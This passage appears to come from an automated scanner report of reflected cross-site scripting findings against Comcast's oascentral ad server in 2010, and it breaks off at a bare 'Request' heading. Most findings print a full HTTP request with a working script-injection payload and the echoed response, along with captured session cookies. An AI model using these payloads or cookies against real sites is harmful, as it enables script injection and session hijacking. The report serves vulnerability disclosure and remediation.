Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/345184688/x32e696a"><img src=a onerror=alert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3bc2"><script>alert(1)</script>e45d8e81862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?a3bc2"><script>alert(1)</script>e45d8e81862=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1924789161/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&a3bc2"><script>alert(1)</script>e45d8e81862=1" WIDTH=2 HEIGHT=2>

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f11"><script>alert(1)</script>19550cf6058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/1234034443/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69b0"><script>alert(1)</script>b11efa66307 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hpf69b0"><script>alert(1)</script>b11efa66307/2022363852/L35/991764332/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1313"><script>alert(1)</script>84290a6437b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 777
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852f1313"><script>alert(1)</script>84290a6437b/L35/6859924/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22ec"><script>alert(1)</script>bf352f0d2a0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35c22ec"><script>alert(1)</script>bf352f0d2a0/L/308597502/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf was submitted in the REST URL parameter 9. This input was echoed as aae3c"><img src=a onerror=alert(1)>24f9f614caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32aae3c"><img%20src%3da%20onerror%3dalert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 783
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1484827575/x32aae3c"><img src=a onerror=alert(1)>24f9f614caf/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ace4"><script>alert(1)</script>ea98919b1f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response: the query string is appended verbatim to the IMG SRC after ?_RM_EMPTY_&, so the name of any parameter reaches the attribute value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?8ace4"><script>alert(1)</script>ea98919b1f9=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 782
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
ream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/1660234141/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&8ace4"><script>alert(1)</script>ea98919b1f9=1" WIDTH=2 HEIGHT=2>

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0a72"><script>alert(1)</script>f7f7069159a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.netb0a72"><script>alert(1)</script>f7f7069159a/network/202236386/L17/628065419/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14935"%3be7e5252438c was submitted in the REST URL parameter 4. This input was echoed as 14935";e7e5252438c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The natural starting point is issues 2.113 and 2.115, where the same TFSMFlash_OASCLICK string accepted the payload "-alert(1)-" in parameters 6 and 7: a bare terminator leaves the remainder of the path inside the script as invalid JavaScript, so the whole script fails to parse, whereas the "-alert(1)-" form keeps the literal inside a valid expression and executes.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the click URL must be reflected, serialise it as a JavaScript string literal with the double quote, backslash and less-than characters escaped, and attribute-encode the copy placed in the IMG SRC. The path segments in this report are numeric identifiers and fixed tokens, so rejecting any segment that falls outside that alphabet before rendering is also practical.

Request

